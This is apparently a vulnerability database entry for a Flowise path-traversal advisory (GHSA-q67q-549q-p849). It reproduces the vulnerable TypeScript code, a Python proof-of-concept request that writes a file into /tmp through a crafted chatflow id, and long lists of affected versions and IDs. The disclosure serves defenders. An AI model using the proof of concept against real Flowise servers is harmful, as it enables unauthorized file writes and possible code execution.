Django REST framework

Lookup for vulnerabilities affecting packages.

Vulnerability_id VCID-g7y6-euhd-jqhh

Summary

Flowise has arbitrary file access due to missing chat flow id validation
### Summary

Missing chat flow id validation allows an attacker to access arbitrary file.

### Details

Commit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` from route `/api/v1/attachments`. In some cases, however,  `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues.

**Case 1**

When creating new chatflow via `/api/v1/chatflows`, function `addBase64FilesToStorage` is called if there exists base64 file data. Although the `filename` is sanitized, the `chatflowid` comes from request body directly without any validation. An attacker could exploit the path traversal here to write arbitrary file with controlled data.

```typescript
export const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => {
    // ...
    } else {
        const dir = path.join(getStoragePath(), chatflowid)  // path traversal here
        if (!fs.existsSync(dir)) {
            fs.mkdirSync(dir, { recursive: true })
        }

        const splitDataURI = fileBase64.split(',')
        const filename = splitDataURI.pop()?.split(':')[1] ?? ''
        const bf = Buffer.from(splitDataURI.pop() || '', 'base64')
        const sanitizedFilename = _sanitizeFilename(filename)

        const filePath = path.join(dir, sanitizedFilename)
        fs.writeFileSync(filePath, bf)
        fileNames.push(sanitizedFilename)
        return 'FILE-STORAGE::' + JSON.stringify(fileNames)
    }
}
```

**Case 2**

When downloading file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, function `streamStorageFile` is called to retrieve file data from local or cloud bucket. The `chatflowId` and `chatId` are used for file path generation. Take Amazon S3 as an example, its [[documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines)](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as relative path.

Note that these APIs are in `WHITELIST_URLS`, an attacker may traverse user storage files without authentication.

### PoC

Launch app at localhost with default config, then run the following python script, a file named 'pwn' will be written to dir `/tmp` with content 'Hello, World!'.

```python
import requests
import json
url = "http://localhost:8080/api/v1/chatflows"
headers = {"x-request-from": "internal"}
nodedata = {
  "category" : "Document Loaders",
  "inputs" : {
    "key" : "data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn"
  }
}
flownode = {
  "id" : "a",
  "data" : nodedata
}
flowdata = {
  "nodes" : [flownode],
  "edges" : [],
  "viewport" : {
    "x" : 1,
    "y" : 1,
    "zoom" : 1
  }
}
data = {
  "id" : "../../../../../tmp",
  "name" : "name",
  "flowData" : json.dumps(flowdata)
}
res = requests.post(url, json=data, headers=headers)
```

### Impact

1. Arbitrary file read / write
2. Remote Code Execution
3. Data loss

Aliases

alias	GHSA-q67q-549q-p849

Fixed_packages

url pkg:npm/flowise@3.0.6

purl pkg:npm/flowise@3.0.6

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-14af-nhf3-aqba

vulnerability	VCID-17k4-psgt-sydg

vulnerability	VCID-19jc-umg6-v7ce

vulnerability	VCID-1xfp-4rtg-4bcu

vulnerability	VCID-2891-vddv-ebff

vulnerability	VCID-39aw-3gc6-bkgb

vulnerability	VCID-3chx-dj2u-kbab

vulnerability	VCID-3gp6-wwtd-kkf1

vulnerability	VCID-488c-vrqu-f7hf

vulnerability	VCID-5j9e-bcr5-n7bs

vulnerability	VCID-5pup-kgaf-3ubw

vulnerability	VCID-67mz-pfy4-ykep

vulnerability	VCID-6ufs-d346-d7ev

vulnerability	VCID-71uq-yx2j-cqak

vulnerability	VCID-9bht-svq8-87b4

vulnerability	VCID-9rqv-p7rz-5kar

vulnerability	VCID-a1e4-f5dh-w3a5

vulnerability	VCID-abyp-yn76-1yfp

vulnerability	VCID-affy-v76q-fub6

vulnerability	VCID-aqg8-6us7-uqef

vulnerability	VCID-b97u-efzx-dffn

vulnerability	VCID-bkmk-k9mn-ekhx

vulnerability	VCID-cb6d-4c2v-w7c3

vulnerability	VCID-cxja-9yxc-k7au

vulnerability	VCID-d4wa-szeh-43ab

vulnerability	VCID-dtss-epth-z7fh

vulnerability	VCID-dzed-27rk-3qav

vulnerability	VCID-e65e-s5sd-kuhp

vulnerability	VCID-ejdc-j73x-jydk

vulnerability	VCID-fu6t-9dk4-jbh9

vulnerability	VCID-gt6n-beak-33gy

vulnerability	VCID-gvpx-4wkw-43cz

vulnerability	VCID-hdej-umwh-kqav

vulnerability	VCID-hkfs-v3bp-kbh5

vulnerability	VCID-j5hh-haj2-qydg

vulnerability	VCID-jcze-eg2c-mkcf

vulnerability	VCID-jmps-anck-eqdt

vulnerability	VCID-k579-xd81-hqdu

vulnerability	VCID-kpyg-gve3-b3av

vulnerability	VCID-ksmv-s6c9-t7ap

vulnerability	VCID-m3j3-4u39-euht

vulnerability	VCID-pzza-9xq9-a7de

vulnerability	VCID-qgs1-hazv-67b8

vulnerability	VCID-qm89-q2ar-uyhy

vulnerability	VCID-r74e-k86f-7qgb

vulnerability	VCID-rgmv-6bqh-eqf2

vulnerability	VCID-s3jg-wce1-fbf3

vulnerability	VCID-tdm1-91mc-8kgr

vulnerability	VCID-v1nz-wwsu-qycg

vulnerability	VCID-v9hg-7pex-g3dp

vulnerability	VCID-w9yr-5jbp-q7fm

vulnerability	VCID-xt1d-efw7-g3c6

vulnerability	VCID-ywgu-76cy-uqe7

vulnerability	VCID-z1y2-f2ws-8ycb

vulnerability	VCID-zwna-stj5-3yhm

vulnerability	VCID-zwz7-byj4-6qan

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6

Affected_packages

url pkg:npm/flowise@2.2.8

purl pkg:npm/flowise@2.2.8

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-14af-nhf3-aqba

vulnerability	VCID-17k4-psgt-sydg

vulnerability	VCID-19jc-umg6-v7ce

vulnerability	VCID-1xfp-4rtg-4bcu

vulnerability	VCID-2891-vddv-ebff

vulnerability	VCID-39aw-3gc6-bkgb

vulnerability	VCID-3chx-dj2u-kbab

vulnerability	VCID-3gp6-wwtd-kkf1

vulnerability	VCID-488c-vrqu-f7hf

vulnerability	VCID-5j9e-bcr5-n7bs

vulnerability	VCID-5pup-kgaf-3ubw

vulnerability	VCID-67mz-pfy4-ykep

vulnerability	VCID-6ufs-d346-d7ev

vulnerability	VCID-6wat-8akx-hycz

vulnerability	VCID-71uq-yx2j-cqak

vulnerability	VCID-9bht-svq8-87b4

vulnerability	VCID-9rqv-p7rz-5kar

vulnerability	VCID-a1e4-f5dh-w3a5

vulnerability	VCID-affy-v76q-fub6

vulnerability	VCID-aqg8-6us7-uqef

vulnerability	VCID-b97u-efzx-dffn

vulnerability	VCID-bkmk-k9mn-ekhx

vulnerability	VCID-cb6d-4c2v-w7c3

vulnerability	VCID-cxja-9yxc-k7au

vulnerability	VCID-d4wa-szeh-43ab

vulnerability	VCID-dtss-epth-z7fh

vulnerability	VCID-dzed-27rk-3qav

vulnerability	VCID-e65e-s5sd-kuhp

vulnerability	VCID-ejdc-j73x-jydk

vulnerability	VCID-fje6-knjc-nfgf

vulnerability	VCID-fu6t-9dk4-jbh9

vulnerability	VCID-g7y6-euhd-jqhh

vulnerability	VCID-gt6n-beak-33gy

vulnerability	VCID-gvpx-4wkw-43cz

vulnerability	VCID-hdej-umwh-kqav

vulnerability	VCID-hkfs-v3bp-kbh5

vulnerability	VCID-j5hh-haj2-qydg

vulnerability	VCID-jcze-eg2c-mkcf

vulnerability	VCID-jmps-anck-eqdt

vulnerability	VCID-k579-xd81-hqdu

vulnerability	VCID-kpyg-gve3-b3av

vulnerability	VCID-ksmv-s6c9-t7ap

vulnerability	VCID-m3j3-4u39-euht

vulnerability	VCID-pzza-9xq9-a7de

vulnerability	VCID-qgs1-hazv-67b8

vulnerability	VCID-qm89-q2ar-uyhy

vulnerability	VCID-r74e-k86f-7qgb

vulnerability	VCID-rgmv-6bqh-eqf2

vulnerability	VCID-rkaz-75t9-r3gs

vulnerability	VCID-s3jg-wce1-fbf3

vulnerability	VCID-t5jg-qrw2-aqcv

vulnerability	VCID-t839-eydz-1ud4

vulnerability	VCID-tdm1-91mc-8kgr

vulnerability	VCID-v1nz-wwsu-qycg

vulnerability	VCID-v9hg-7pex-g3dp

vulnerability	VCID-w9yr-5jbp-q7fm

vulnerability	VCID-wg28-w8vn-ybb5

vulnerability	VCID-xt1d-efw7-g3c6

vulnerability	VCID-ywgu-76cy-uqe7

vulnerability	VCID-z1y2-f2ws-8ycb

vulnerability	VCID-zbrd-qdty-2bfs

vulnerability	VCID-zwna-stj5-3yhm

vulnerability	VCID-zwz7-byj4-6qan

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@2.2.8

url pkg:npm/flowise@3.0.0

purl pkg:npm/flowise@3.0.0

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-14af-nhf3-aqba

vulnerability	VCID-17k4-psgt-sydg

vulnerability	VCID-19jc-umg6-v7ce

vulnerability	VCID-1xfp-4rtg-4bcu

vulnerability	VCID-2891-vddv-ebff

vulnerability	VCID-39aw-3gc6-bkgb

vulnerability	VCID-3chx-dj2u-kbab

vulnerability	VCID-3gp6-wwtd-kkf1

vulnerability	VCID-488c-vrqu-f7hf

vulnerability	VCID-5j9e-bcr5-n7bs

vulnerability	VCID-5pup-kgaf-3ubw

vulnerability	VCID-67mz-pfy4-ykep

vulnerability	VCID-6ufs-d346-d7ev

vulnerability	VCID-6wat-8akx-hycz

vulnerability	VCID-71uq-yx2j-cqak

vulnerability	VCID-9bht-svq8-87b4

vulnerability	VCID-9rqv-p7rz-5kar

vulnerability	VCID-a1e4-f5dh-w3a5

vulnerability	VCID-affy-v76q-fub6

vulnerability	VCID-aqg8-6us7-uqef

vulnerability	VCID-b97u-efzx-dffn

vulnerability	VCID-bkmk-k9mn-ekhx

vulnerability	VCID-cb6d-4c2v-w7c3

vulnerability	VCID-cxja-9yxc-k7au

vulnerability	VCID-d4wa-szeh-43ab

vulnerability	VCID-dtss-epth-z7fh

vulnerability	VCID-dzed-27rk-3qav

vulnerability	VCID-e65e-s5sd-kuhp

vulnerability	VCID-ejdc-j73x-jydk

vulnerability	VCID-fje6-knjc-nfgf

vulnerability	VCID-fu6t-9dk4-jbh9

vulnerability	VCID-g7y6-euhd-jqhh

vulnerability	VCID-gt6n-beak-33gy

vulnerability	VCID-gvpx-4wkw-43cz

vulnerability	VCID-hdej-umwh-kqav

vulnerability	VCID-hkfs-v3bp-kbh5

vulnerability	VCID-j5hh-haj2-qydg

vulnerability	VCID-jcze-eg2c-mkcf

vulnerability	VCID-jmps-anck-eqdt

vulnerability	VCID-k579-xd81-hqdu

vulnerability	VCID-kpyg-gve3-b3av

vulnerability	VCID-ksmv-s6c9-t7ap

vulnerability	VCID-m3j3-4u39-euht

vulnerability	VCID-pzza-9xq9-a7de

vulnerability	VCID-qgs1-hazv-67b8

vulnerability	VCID-qm89-q2ar-uyhy

vulnerability	VCID-r74e-k86f-7qgb

vulnerability	VCID-rgmv-6bqh-eqf2

vulnerability	VCID-rkaz-75t9-r3gs

vulnerability	VCID-s3jg-wce1-fbf3

vulnerability	VCID-t5jg-qrw2-aqcv

vulnerability	VCID-t839-eydz-1ud4

vulnerability	VCID-tdm1-91mc-8kgr

vulnerability	VCID-v1nz-wwsu-qycg

vulnerability	VCID-v9hg-7pex-g3dp

vulnerability	VCID-w9yr-5jbp-q7fm

vulnerability	VCID-wg28-w8vn-ybb5

vulnerability	VCID-xt1d-efw7-g3c6

vulnerability	VCID-ywgu-76cy-uqe7

vulnerability	VCID-z1y2-f2ws-8ycb

vulnerability	VCID-zbrd-qdty-2bfs

vulnerability	VCID-zwna-stj5-3yhm

vulnerability	VCID-zwz7-byj4-6qan

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.0

url pkg:npm/flowise@3.0.1

purl pkg:npm/flowise@3.0.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-14af-nhf3-aqba

vulnerability	VCID-17k4-psgt-sydg

vulnerability	VCID-19jc-umg6-v7ce

vulnerability	VCID-1xfp-4rtg-4bcu

vulnerability	VCID-2891-vddv-ebff

vulnerability	VCID-39aw-3gc6-bkgb

vulnerability	VCID-3chx-dj2u-kbab

vulnerability	VCID-3gp6-wwtd-kkf1

vulnerability	VCID-488c-vrqu-f7hf

vulnerability	VCID-5j9e-bcr5-n7bs

vulnerability	VCID-5pup-kgaf-3ubw

vulnerability	VCID-67mz-pfy4-ykep

vulnerability	VCID-6ufs-d346-d7ev

vulnerability	VCID-6wat-8akx-hycz

vulnerability	VCID-71uq-yx2j-cqak

vulnerability	VCID-9bht-svq8-87b4

vulnerability	VCID-9rqv-p7rz-5kar

vulnerability	VCID-a1e4-f5dh-w3a5

vulnerability	VCID-abyp-yn76-1yfp

vulnerability	VCID-affy-v76q-fub6

vulnerability	VCID-aqg8-6us7-uqef

vulnerability	VCID-b97u-efzx-dffn

vulnerability	VCID-bkmk-k9mn-ekhx

vulnerability	VCID-cb6d-4c2v-w7c3

vulnerability	VCID-cxja-9yxc-k7au

vulnerability	VCID-d4wa-szeh-43ab

vulnerability	VCID-dtss-epth-z7fh

vulnerability	VCID-dzed-27rk-3qav

vulnerability	VCID-e65e-s5sd-kuhp

vulnerability	VCID-ejdc-j73x-jydk

vulnerability	VCID-fje6-knjc-nfgf

vulnerability	VCID-fu6t-9dk4-jbh9

vulnerability	VCID-g7y6-euhd-jqhh

vulnerability	VCID-gt6n-beak-33gy

vulnerability	VCID-gvpx-4wkw-43cz

vulnerability	VCID-hdej-umwh-kqav

vulnerability	VCID-hkfs-v3bp-kbh5

vulnerability	VCID-j5hh-haj2-qydg

vulnerability	VCID-jcze-eg2c-mkcf

vulnerability	VCID-jmps-anck-eqdt

vulnerability	VCID-k579-xd81-hqdu

vulnerability	VCID-kpyg-gve3-b3av

vulnerability	VCID-ksmv-s6c9-t7ap

vulnerability	VCID-m3j3-4u39-euht

vulnerability	VCID-pzza-9xq9-a7de

vulnerability	VCID-qgs1-hazv-67b8

vulnerability	VCID-qm89-q2ar-uyhy

vulnerability	VCID-r74e-k86f-7qgb

vulnerability	VCID-rgmv-6bqh-eqf2

vulnerability	VCID-rkaz-75t9-r3gs

vulnerability	VCID-s3jg-wce1-fbf3

vulnerability	VCID-t5jg-qrw2-aqcv

vulnerability	VCID-t839-eydz-1ud4

vulnerability	VCID-tdm1-91mc-8kgr

vulnerability	VCID-u91w-qe9z-rfg4

vulnerability	VCID-v1nz-wwsu-qycg

vulnerability	VCID-v9hg-7pex-g3dp

vulnerability	VCID-w9yr-5jbp-q7fm

vulnerability	VCID-wg28-w8vn-ybb5

vulnerability	VCID-xt1d-efw7-g3c6

vulnerability	VCID-ywgu-76cy-uqe7

vulnerability	VCID-z1y2-f2ws-8ycb

vulnerability	VCID-zbrd-qdty-2bfs

vulnerability	VCID-zwna-stj5-3yhm

vulnerability	VCID-zwz7-byj4-6qan

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.1

url pkg:npm/flowise@3.0.2

purl pkg:npm/flowise@3.0.2

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-14af-nhf3-aqba

vulnerability	VCID-17k4-psgt-sydg

vulnerability	VCID-19jc-umg6-v7ce

vulnerability	VCID-1xfp-4rtg-4bcu

vulnerability	VCID-2891-vddv-ebff

vulnerability	VCID-39aw-3gc6-bkgb

vulnerability	VCID-3chx-dj2u-kbab

vulnerability	VCID-3gp6-wwtd-kkf1

vulnerability	VCID-488c-vrqu-f7hf

vulnerability	VCID-5j9e-bcr5-n7bs

vulnerability	VCID-5pup-kgaf-3ubw

vulnerability	VCID-67mz-pfy4-ykep

vulnerability	VCID-6ufs-d346-d7ev

vulnerability	VCID-6wat-8akx-hycz

vulnerability	VCID-71uq-yx2j-cqak

vulnerability	VCID-9bht-svq8-87b4

vulnerability	VCID-9rqv-p7rz-5kar

vulnerability	VCID-a1e4-f5dh-w3a5

vulnerability	VCID-abyp-yn76-1yfp

vulnerability	VCID-affy-v76q-fub6

vulnerability	VCID-aqg8-6us7-uqef

vulnerability	VCID-b97u-efzx-dffn

vulnerability	VCID-bkmk-k9mn-ekhx

vulnerability	VCID-cb6d-4c2v-w7c3

vulnerability	VCID-cxja-9yxc-k7au

vulnerability	VCID-d4wa-szeh-43ab

vulnerability	VCID-dtss-epth-z7fh

vulnerability	VCID-dzed-27rk-3qav

vulnerability	VCID-e65e-s5sd-kuhp

vulnerability	VCID-ejdc-j73x-jydk

vulnerability	VCID-fje6-knjc-nfgf

vulnerability	VCID-fu6t-9dk4-jbh9

vulnerability	VCID-g7y6-euhd-jqhh

vulnerability	VCID-gt6n-beak-33gy

vulnerability	VCID-gvpx-4wkw-43cz

vulnerability	VCID-hdej-umwh-kqav

vulnerability	VCID-hkfs-v3bp-kbh5

vulnerability	VCID-j5hh-haj2-qydg

vulnerability	VCID-jcze-eg2c-mkcf

vulnerability	VCID-jmps-anck-eqdt

vulnerability	VCID-k579-xd81-hqdu

vulnerability	VCID-kpyg-gve3-b3av

vulnerability	VCID-ksmv-s6c9-t7ap

vulnerability	VCID-m3j3-4u39-euht

vulnerability	VCID-pzza-9xq9-a7de

vulnerability	VCID-qgs1-hazv-67b8

vulnerability	VCID-qm89-q2ar-uyhy

vulnerability	VCID-r74e-k86f-7qgb

vulnerability	VCID-rgmv-6bqh-eqf2

vulnerability	VCID-rkaz-75t9-r3gs

vulnerability	VCID-s3jg-wce1-fbf3

vulnerability	VCID-t5jg-qrw2-aqcv

vulnerability	VCID-t839-eydz-1ud4

vulnerability	VCID-tdm1-91mc-8kgr

vulnerability	VCID-v1nz-wwsu-qycg

vulnerability	VCID-v9hg-7pex-g3dp

vulnerability	VCID-w9yr-5jbp-q7fm

vulnerability	VCID-wg28-w8vn-ybb5

vulnerability	VCID-xt1d-efw7-g3c6

vulnerability	VCID-ywgu-76cy-uqe7

vulnerability	VCID-z1y2-f2ws-8ycb

vulnerability	VCID-zbrd-qdty-2bfs

vulnerability	VCID-zwna-stj5-3yhm

vulnerability	VCID-zwz7-byj4-6qan

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.2

url pkg:npm/flowise@3.0.3

purl pkg:npm/flowise@3.0.3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-14af-nhf3-aqba

vulnerability	VCID-17k4-psgt-sydg

vulnerability	VCID-19jc-umg6-v7ce

vulnerability	VCID-1xfp-4rtg-4bcu

vulnerability	VCID-2891-vddv-ebff

vulnerability	VCID-39aw-3gc6-bkgb

vulnerability	VCID-3chx-dj2u-kbab

vulnerability	VCID-3gp6-wwtd-kkf1

vulnerability	VCID-488c-vrqu-f7hf

vulnerability	VCID-5j9e-bcr5-n7bs

vulnerability	VCID-5pup-kgaf-3ubw

vulnerability	VCID-67mz-pfy4-ykep

vulnerability	VCID-6ufs-d346-d7ev

vulnerability	VCID-6wat-8akx-hycz

vulnerability	VCID-71uq-yx2j-cqak

vulnerability	VCID-9bht-svq8-87b4

vulnerability	VCID-9rqv-p7rz-5kar

vulnerability	VCID-a1e4-f5dh-w3a5

vulnerability	VCID-abyp-yn76-1yfp

vulnerability	VCID-affy-v76q-fub6

vulnerability	VCID-aqg8-6us7-uqef

vulnerability	VCID-b97u-efzx-dffn

vulnerability	VCID-bkmk-k9mn-ekhx

vulnerability	VCID-cb6d-4c2v-w7c3

vulnerability	VCID-cxja-9yxc-k7au

vulnerability	VCID-d4wa-szeh-43ab

vulnerability	VCID-dtss-epth-z7fh

vulnerability	VCID-dzed-27rk-3qav

vulnerability	VCID-e65e-s5sd-kuhp

vulnerability	VCID-ejdc-j73x-jydk

vulnerability	VCID-fje6-knjc-nfgf

vulnerability	VCID-fu6t-9dk4-jbh9

vulnerability	VCID-g7y6-euhd-jqhh

vulnerability	VCID-gt6n-beak-33gy

vulnerability	VCID-gvpx-4wkw-43cz

vulnerability	VCID-hdej-umwh-kqav

vulnerability	VCID-hkfs-v3bp-kbh5

vulnerability	VCID-j5hh-haj2-qydg

vulnerability	VCID-jcze-eg2c-mkcf

vulnerability	VCID-jmps-anck-eqdt

vulnerability	VCID-k579-xd81-hqdu

vulnerability	VCID-kpyg-gve3-b3av

vulnerability	VCID-ksmv-s6c9-t7ap

vulnerability	VCID-m3j3-4u39-euht

vulnerability	VCID-pzza-9xq9-a7de

vulnerability	VCID-qgs1-hazv-67b8

vulnerability	VCID-qm89-q2ar-uyhy

vulnerability	VCID-r74e-k86f-7qgb

vulnerability	VCID-rgmv-6bqh-eqf2

vulnerability	VCID-rkaz-75t9-r3gs

vulnerability	VCID-s3jg-wce1-fbf3

vulnerability	VCID-t5jg-qrw2-aqcv

vulnerability	VCID-t839-eydz-1ud4

vulnerability	VCID-tdm1-91mc-8kgr

vulnerability	VCID-v1nz-wwsu-qycg

vulnerability	VCID-v9hg-7pex-g3dp

vulnerability	VCID-w9yr-5jbp-q7fm

vulnerability	VCID-wg28-w8vn-ybb5

vulnerability	VCID-xt1d-efw7-g3c6

vulnerability	VCID-ywgu-76cy-uqe7

vulnerability	VCID-z1y2-f2ws-8ycb

vulnerability	VCID-zbrd-qdty-2bfs

vulnerability	VCID-zwna-stj5-3yhm

vulnerability	VCID-zwz7-byj4-6qan

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.3

url pkg:npm/flowise@3.0.4

purl pkg:npm/flowise@3.0.4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-14af-nhf3-aqba

vulnerability	VCID-17k4-psgt-sydg

vulnerability	VCID-19jc-umg6-v7ce

vulnerability	VCID-1xfp-4rtg-4bcu

vulnerability	VCID-2891-vddv-ebff

vulnerability	VCID-39aw-3gc6-bkgb

vulnerability	VCID-3chx-dj2u-kbab

vulnerability	VCID-3gp6-wwtd-kkf1

vulnerability	VCID-488c-vrqu-f7hf

vulnerability	VCID-5j9e-bcr5-n7bs

vulnerability	VCID-5pup-kgaf-3ubw

vulnerability	VCID-67mz-pfy4-ykep

vulnerability	VCID-6ufs-d346-d7ev

vulnerability	VCID-6wat-8akx-hycz

vulnerability	VCID-71uq-yx2j-cqak

vulnerability	VCID-9bht-svq8-87b4

vulnerability	VCID-9rqv-p7rz-5kar

vulnerability	VCID-a1e4-f5dh-w3a5

vulnerability	VCID-abyp-yn76-1yfp

vulnerability	VCID-affy-v76q-fub6

vulnerability	VCID-aqg8-6us7-uqef

vulnerability	VCID-b97u-efzx-dffn

vulnerability	VCID-bkmk-k9mn-ekhx

vulnerability	VCID-cb6d-4c2v-w7c3

vulnerability	VCID-cxja-9yxc-k7au

vulnerability	VCID-d4wa-szeh-43ab

vulnerability	VCID-dtss-epth-z7fh

vulnerability	VCID-dzed-27rk-3qav

vulnerability	VCID-e65e-s5sd-kuhp

vulnerability	VCID-ejdc-j73x-jydk

vulnerability	VCID-fje6-knjc-nfgf

vulnerability	VCID-fu6t-9dk4-jbh9

vulnerability	VCID-g7y6-euhd-jqhh

vulnerability	VCID-gt6n-beak-33gy

vulnerability	VCID-gvpx-4wkw-43cz

vulnerability	VCID-hdej-umwh-kqav

vulnerability	VCID-hkfs-v3bp-kbh5

vulnerability	VCID-j5hh-haj2-qydg

vulnerability	VCID-jcze-eg2c-mkcf

vulnerability	VCID-jmps-anck-eqdt

vulnerability	VCID-k579-xd81-hqdu

vulnerability	VCID-kpyg-gve3-b3av

vulnerability	VCID-ksmv-s6c9-t7ap

vulnerability	VCID-m3j3-4u39-euht

vulnerability	VCID-pzza-9xq9-a7de

vulnerability	VCID-qgs1-hazv-67b8

vulnerability	VCID-qm89-q2ar-uyhy

vulnerability	VCID-r74e-k86f-7qgb

vulnerability	VCID-rgmv-6bqh-eqf2

vulnerability	VCID-rkaz-75t9-r3gs

vulnerability	VCID-s3jg-wce1-fbf3

vulnerability	VCID-t5jg-qrw2-aqcv

vulnerability	VCID-t839-eydz-1ud4

vulnerability	VCID-tdm1-91mc-8kgr

vulnerability	VCID-v1nz-wwsu-qycg

vulnerability	VCID-v9hg-7pex-g3dp

vulnerability	VCID-w9yr-5jbp-q7fm

vulnerability	VCID-wg28-w8vn-ybb5

vulnerability	VCID-xt1d-efw7-g3c6

vulnerability	VCID-ywgu-76cy-uqe7

vulnerability	VCID-z1y2-f2ws-8ycb

vulnerability	VCID-zbrd-qdty-2bfs

vulnerability	VCID-zwna-stj5-3yhm

vulnerability	VCID-zwz7-byj4-6qan

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.4

url pkg:npm/flowise@3.0.5

purl pkg:npm/flowise@3.0.5

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-14af-nhf3-aqba

vulnerability	VCID-17k4-psgt-sydg

vulnerability	VCID-19jc-umg6-v7ce

vulnerability	VCID-1xfp-4rtg-4bcu

vulnerability	VCID-2891-vddv-ebff

vulnerability	VCID-39aw-3gc6-bkgb

vulnerability	VCID-3chx-dj2u-kbab

vulnerability	VCID-3gp6-wwtd-kkf1

vulnerability	VCID-488c-vrqu-f7hf

vulnerability	VCID-5hdy-fsnn-qfgq

vulnerability	VCID-5j9e-bcr5-n7bs

vulnerability	VCID-5pup-kgaf-3ubw

vulnerability	VCID-67mz-pfy4-ykep

vulnerability	VCID-6ufs-d346-d7ev

vulnerability	VCID-6wat-8akx-hycz

vulnerability	VCID-71uq-yx2j-cqak

vulnerability	VCID-8vsg-mxay-gkf7

vulnerability	VCID-9bht-svq8-87b4

vulnerability	VCID-9rqv-p7rz-5kar

vulnerability	VCID-a1e4-f5dh-w3a5

vulnerability	VCID-abyp-yn76-1yfp

vulnerability	VCID-affy-v76q-fub6

vulnerability	VCID-aqg8-6us7-uqef

vulnerability	VCID-b97u-efzx-dffn

vulnerability	VCID-bkmk-k9mn-ekhx

vulnerability	VCID-cb6d-4c2v-w7c3

vulnerability	VCID-cxja-9yxc-k7au

vulnerability	VCID-d4wa-szeh-43ab

vulnerability	VCID-dtss-epth-z7fh

vulnerability	VCID-dzed-27rk-3qav

vulnerability	VCID-e65e-s5sd-kuhp

vulnerability	VCID-ejdc-j73x-jydk

vulnerability	VCID-fje6-knjc-nfgf

vulnerability	VCID-fu6t-9dk4-jbh9

vulnerability	VCID-g7y6-euhd-jqhh

vulnerability	VCID-gt6n-beak-33gy

vulnerability	VCID-gvpx-4wkw-43cz

vulnerability	VCID-hdej-umwh-kqav

vulnerability	VCID-hkfs-v3bp-kbh5

vulnerability	VCID-j5hh-haj2-qydg

vulnerability	VCID-jcze-eg2c-mkcf

vulnerability	VCID-jmps-anck-eqdt

vulnerability	VCID-k579-xd81-hqdu

vulnerability	VCID-kpyg-gve3-b3av

vulnerability	VCID-ksmv-s6c9-t7ap

vulnerability	VCID-m3j3-4u39-euht

vulnerability	VCID-n77p-4nu7-2yb4

vulnerability	VCID-pg5c-6y4s-h3cq

vulnerability	VCID-pzza-9xq9-a7de

vulnerability	VCID-qgs1-hazv-67b8

vulnerability	VCID-qm89-q2ar-uyhy

vulnerability	VCID-r74e-k86f-7qgb

vulnerability	VCID-rgmv-6bqh-eqf2

vulnerability	VCID-s3jg-wce1-fbf3

vulnerability	VCID-t839-eydz-1ud4

vulnerability	VCID-tdm1-91mc-8kgr

vulnerability	VCID-v1nz-wwsu-qycg

vulnerability	VCID-v9hg-7pex-g3dp

vulnerability	VCID-w9yr-5jbp-q7fm

vulnerability	VCID-wt2v-e5sa-n3g8

vulnerability	VCID-xt1d-efw7-g3c6

vulnerability	VCID-ywgu-76cy-uqe7

vulnerability	VCID-z1y2-f2ws-8ycb

vulnerability	VCID-zbrd-qdty-2bfs

vulnerability	VCID-zwna-stj5-3yhm

vulnerability	VCID-zwz7-byj4-6qan

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5

References

reference_url

https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f

reference_id

reference_type

scores

value	9.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f

reference_url

https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7

reference_id

reference_type

scores

value	9.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7

reference_url

https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849

reference_id

reference_type

scores

value	9.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

value	CRITICAL
scoring_system	cvssv3.1_qr
scoring_elements

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849

reference_url

https://github.com/advisories/GHSA-q67q-549q-p849

reference_id

GHSA-q67q-549q-p849

reference_type

scores

value	CRITICAL
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-q67q-549q-p849

Weaknesses

cwe_id	22
name	Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
